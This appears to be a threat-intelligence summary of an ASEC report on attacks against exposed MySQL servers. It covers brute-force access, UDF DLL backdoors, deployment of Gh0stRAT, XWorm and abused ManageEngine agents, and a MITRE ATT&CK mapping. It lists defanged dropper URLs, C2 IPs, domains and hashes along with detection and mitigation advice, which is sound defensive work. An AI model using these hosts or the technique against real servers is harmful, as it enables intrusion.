Full Report
AhnLab SEcurity intelligence Center (ASEC) is monitoring attacks targeting poorly managed services, and has confirmed that MySQL servers have remained a continuous target of attacks. Threat actors are believed to be targeting various externally accessible systems, leading to the infection of multiple systems in Korea with malware. The majority of malware strains used in […]
Analysis Summary
# Tool/Technique: MySQL Server Exploitation and UDF Malware
## Overview
This describes a series of ongoing attacks targeting poorly managed MySQL servers, typically exposed externally (port 3306/TCP). Attackers gain access via brute-force/dictionary attacks, install malicious User Defined Function (UDF) malware libraries into the MySQL server to execute system commands, and subsequently deploy various remote access tools and other malware payloads.
## Technical Details
- Type: Technique/Malware (UDF Malware, Gh0stRAT, XWorm, HpLoader, Zoho ManageEngine components)
- Platform: Windows (though MySQL is often associated with Linux, attacks documented here target Windows environments exposing MySQL)
- Capabilities: Brute-forcing access, executing arbitrary commands via UDFs, installing RATs, downloading further payloads, and deploying remote management tools.
- First Seen: Ongoing/Continuous targeting observed.
## MITRE ATT&CK Mapping
The overall attack chain involves several key mappings:
- **TA0001 - Initial Access**
- T1110 - Brute Force
- T1110.001 - Password Guessing
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (via UDF execution)
- **TA0003 - Persistence**
- T1543.003 - Windows Service (If RATs or agents are installed as services)
- **TA0005 - Defense Evasion**
- T1218 - System Binary Proxy Execution (Possible if UACMe components are involved)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (C2 communication from deployed RATs)
## Functionality
### Core Capabilities
- **MySQL Compromise:** Threat actors use brute-force or dictionary attacks against publicly exposed MySQL port 3306/TCP.
- **UDF Malware Installation:** Malicious DLLs are uploaded to the infected system and loaded into MySQL as User Defined Functions.
- **Command Execution:** The loaded UDF acts as a backdoor, allowing the execution of OS commands passed as arguments.
- **Payload Delivery:** UDFs can download files from specified URLs to install secondary malware or execute stagers directly in memory.
### Advanced Features
- **Gh0stRAT Integration:** Malware often includes Gh0stRAT variants, sometimes featuring extracted command-and-control logic from UACMe for privilege escalation.
- **Screen Capture:** Gh0stRAT variants specifically capture screenshots and save them to `%ALLUSERSPROFILE%\quickScreenShot\[Date]\[Date+Time].jpg`.
- **Remote Management Abuse:** Deployment of legitimate tools abused for C2, such as Zoho ManageEngine (using ManageEndpoint agent) installed silently via scripts (`C:\PerfLogs\Install.bat` and `C:\PerfLogs\Server_Agent.exe`).
## Indicators of Compromise
- File Hashes:
- `2cd59cff23a2e0f98e710bf52b799154`
- `33096e0bc0785ffb2094054bebb9be26`
- `3ee3a5fef87b72a024bd0f45e6f6039f`
- `454ff880e99d5777276bdee1a3e078d9`
- `9d098864bc5746b9ff00432686d59b9f`
- File Names:
- `Server_Agent.exe`
- `Install.bat`
- Registry Keys: [Not explicitly detailed, but persistence mechanisms would likely involve registry modifications by deployed malware like Gh0stRAT or XWorm]
- Network Indicators:
- Command and Control/Dropper URLs:
- `hxxp://39[.]108[.]132[.]22:8080/ceshi[.]exe`
- `hxxp://star[.]zcnet[.]net:7766/Server[.]exe`
- FQDNs:
- `star[.]zcnet[.]net`
- `yyinfo8999[.]fit`
- IPs:
- `103[.]101[.]178[.]170`
- `154[.]204[.]177[.]54`
- `154[.]222[.]24[.]186`
- `39[.]108[.]132[.]22`
- Behavioral Indicators:
- MySQL server process executing system commands (suggesting UDF abuse).
- File creation in `%ALLUSERSPROFILE%\quickScreenShot\`.
- Installation components deployed to `C:\PerfLogs\`.
- Communication with remote control servers over non-standard ports (e.g., 7766).
## Associated Threat Actors
- Threat actors targeting poorly managed external services (No specific group named, but utilizing generalized commodity malware like Gh0stRAT variants).
## Detection Methods
- Signature-based detection: Identification of known malware hashes (Gh0stRAT, XWorm, AsyncRAT, Ddostf, HpLoader).
- Behavioral detection: Monitoring for the loading of unauthorized DLLs into the MySQL process space, or the MySQL process executing shell commands.
- YARA rules: Likely applicable for detecting patterns within the UDF DLLs or the configuration files of the RATs.
## Mitigation Strategies
- **Network Restriction:** Restrict external exposure of the MySQL port (3306/TCP). Limit access IPs using security devices unless strictly necessary.
- **Credential Strength:** Implement strong account and password policies for database credentials.
- **Privilege Minimization:** Minimize the permissions granted to the MySQL server account.
- **Patching:** Ensure MySQL and the underlying Operating System are fully patched against known vulnerabilities.
## Related Tools/Techniques
- **Malware Families:** Gh0stRAT, AsyncRAT, Ddostf DDoS Bot, XWorm, HpLoader.
- **Abused Legitimate Tools:** Zoho ManageEngine (UEMS Agent).
- **Related Database Exploitation Technique:** CLR SqlShell abuse (mentioned in comparison to MS-SQL servers).